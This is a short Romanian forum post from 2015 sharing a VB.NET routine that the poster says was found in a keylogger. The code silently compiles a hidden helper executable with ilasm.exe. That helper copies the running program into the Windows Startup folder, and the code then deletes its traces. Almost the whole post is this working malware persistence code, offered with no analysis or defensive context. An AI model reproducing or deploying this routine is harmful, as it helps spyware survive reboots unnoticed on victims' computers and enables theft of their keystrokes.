Byte-ul Posted June 14, 2015 Report Posted June 14, 2015 Ceva mai special gasit intr-un keylogger Public Sub ILAddToStartUp(ByVal assemblyName As String) Dim genLocation As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & assemblyName & ".il" Dim genExe As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & assemblyName & ".exe" Dim ILAsm As String = Environment.SystemDirectory(0) & ":\Windows\Microsoft.NET\Framework\v2.0.50727\ilasm.exe" Dim copied As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\" & IO.Path.GetFileName(Windows.Forms.Application.ExecutablePath) Try If IO.File.Exists(genLocation) Then IO.File.Delete(genLocation) 'If IO.File.Exists(genExe) Then IO.File.Delete(genExe) If IO.File.Exists(copied) Then Exit Sub Dim newLine As String = Environment.NewLine Dim source As String = Windows.Forms.Application.ExecutablePath Dim code As String = ".assembly extern mscorlib {}" & newLine & _ ".assembly extern System {" & newLine & _ " .ver 2:0:0:0" & newLine & _ " .publickeytoken = (B7 7A 5C 56 19 34 E0 89)" & newLine & _ "}" & newLine & _ ".assembly " & assemblyName & "{ .ver 1:0:1:0 }" & newLine & _ ".module " & assemblyName & ".exe" & newLine & _ ".method public static void Main() cil managed {" & newLine & _ ".maxstack 2" & newLine & _ ".entrypoint" & newLine & _ ".locals init ([0] class [mscorlib]System.Exception ex)" & newLine & _ "L_02: ldstr """ & source & """" & newLine & _ "L_07: ldstr """ & Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\" & IO.Path.GetFileName(source) & """" & newLine & _ "L_0c: call void [mscorlib]System.IO.File::Copy(string, string)" & newLine & _ "L_12: leave.s L_23" & newLine & _ "L_14: dup" & newLine & _ "L_1a: stloc.0" & newLine & _ "L_21: leave.s L_23" & newLine & _ "L_23: nop" & newLine & _ "L_25: ret" & newLine & _ ".try L_02 to L_14 catch [mscorlib]System.Exception handler L_14 to L_23" & newLine & _ "}" code = code.Replace("\", "\\") IO.File.WriteAllText(genLocation, code) Shell(ILAsm & " " & ChrW(34) & genLocation & ChrW(34), AppWinStyle.Hide) While Not IO.File.Exists(genExe) System.Threading.Thread.Sleep(10) End While Shell(genExe, AppWinStyle.Hide) While Not IO.File.Exists(copied) System.Threading.Thread.Sleep(10) End While IO.File.Delete(genLocation) Catch ex As Exception End TryEnd Sub Quote